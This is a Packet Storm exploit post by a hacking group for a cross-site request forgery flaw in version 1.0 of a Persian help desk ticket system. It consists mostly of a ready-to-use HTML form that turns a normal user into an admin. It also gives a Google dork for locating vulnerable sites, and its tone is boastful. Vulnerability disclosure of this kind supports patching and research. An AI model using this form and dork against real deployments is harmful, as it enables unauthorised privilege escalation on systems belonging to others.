Help Desk Customer Service Ticket System version 1.0 suffers from a cross site request forgery vulnerability.
10517e8b0ffd34e3c6608f37beca0ca176e30260daa5ec16077abc4127e1bebf**************************************************
IIIIIIII RRRRRRRRRRRR HHHHHHHH HHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRRRRRRRR HHHHHHHHHHHHHHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIII RRRR RRRR HHHH HHHH
IIIIIIII RRRRRRRR RRRRRR HHHHHHHH HHHHHHHH
***************************************************
# Exploit Title: Help desk customer service ticket System v.1.0 CSRF Vulnerability
# Google Dork: inurl:?L=login inurl:?L=admin.user.list
# Date: 2014
# Exploit Author: IRH
# Version: v.1.0
# Tested on: BT , 7
# Software Link: http://www.persianscript.ir/1389/08/06/help-desk-customer-service-ticket-system/
# Download Vulnerability Script : http://www.dl.persianscript.ir/script/persian-ticket-script%28PersianScript.ir%29.zip
# Screen shot: http://cld.persiangig.com/preview/9FtH6IJJjk/190.png
***************************************************
Exploit :
<html>
<body>
<form action="http://localhost/support/?L=admin.user.list" method="post" name="main" id="main">
<input type="hidden" name="userid" value="1124">
<input type="button" name="makeadmin" value="+Admin">
<input type="submit" name="Submit" value="Send">
</form>
</body>
</html>
*********
info :
change Normal user to admin user with this exploit :D
TnX To :
MojiRider , V30sharp , Black.viper , Zer0killer , SecretWalker , FarBodEzrail , Amirio , AL1R3Z4, 3is@ ,
Mr.a!i , Mr.3ler0n , Irblackhat , inj3ct0r , 3inst3in , Remot3r , Scoot3r , Black_king , IRH Member
./IRaNHaCK.org
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed